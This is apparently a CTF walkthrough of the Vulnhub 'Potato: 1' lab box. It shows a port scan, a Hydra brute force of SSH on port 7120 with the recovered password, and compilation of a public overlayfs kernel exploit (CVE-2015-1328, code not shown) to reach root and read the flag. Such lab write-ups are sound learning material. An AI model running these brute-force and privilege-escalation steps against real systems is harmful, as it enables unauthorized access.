Vulnhub - Potato: 1
Introduction
Difficulty: Easy to Medium
Tested: VMware Workstation 15.x Pro (This works better with VMware rather than VirtualBox)
Goal: Get the root shell i.e.(root@localhost:~#) and then obtain flag under /root).
This is another box from the same people who made Chili and Cherry, but it’s rated easy to medium rather than just easy, so presumably it’s a little more challenging.
nmap
This time we get just two ports, 80 and 7120. 80 is HTTP, and 7120 is running SSH.
Enumerating the webserver doesn’t turn up anything except /info.php which displays phpinfo. By itself; not useful.
SSH
Welp, let’s bruteforce SSH then lol:
root@kali:/opt/vulnhub/potato# hydra -s 7120 -l potato -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt 192.168.1.82 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-09-16 10:58:31
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 9999 login tries (l:1/p:9999), ~625 tries per task
[DATA] attacking ssh://192.168.1.82:7120/
[STATUS] 177.00 tries/min, 177 tries in 00:01h, 9823 to do in 00:56h, 16 active
[7120][ssh] host: 192.168.1.82 login: potato password: letmein
1 of 1 target successfully completed, 1 valid password foundThat was pretty easy, so presumably it’s what we were supposed to do.
Privesc
Once we SSH in as potato we run linpeas as usual; we are on an older Ubuntu build here and it highlights our kernel (3.13.0) as vulnerable. Googling around we find this, an exploit for CVE-2015-1328, a Local Privilege Escalation vulnerability in ‘overlayfs’. I wonder if it works?
potato@ubuntu:/dev/shm$ nano ofs.c -> code pasted here
potato@ubuntu:/dev/shm$ gcc ofs.c
potato@ubuntu:/dev/shm$ ./a.out
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# whoami
root
# cd /root
# find proof.txt
proof.txt
# cat proof.txt
SunCSR.Team.Potato.af6d45da1f1181347b9e2139f23c6a5bWell, that’s a yes it does. Still falls in the easy category for mine. The next one will probably kick my butt.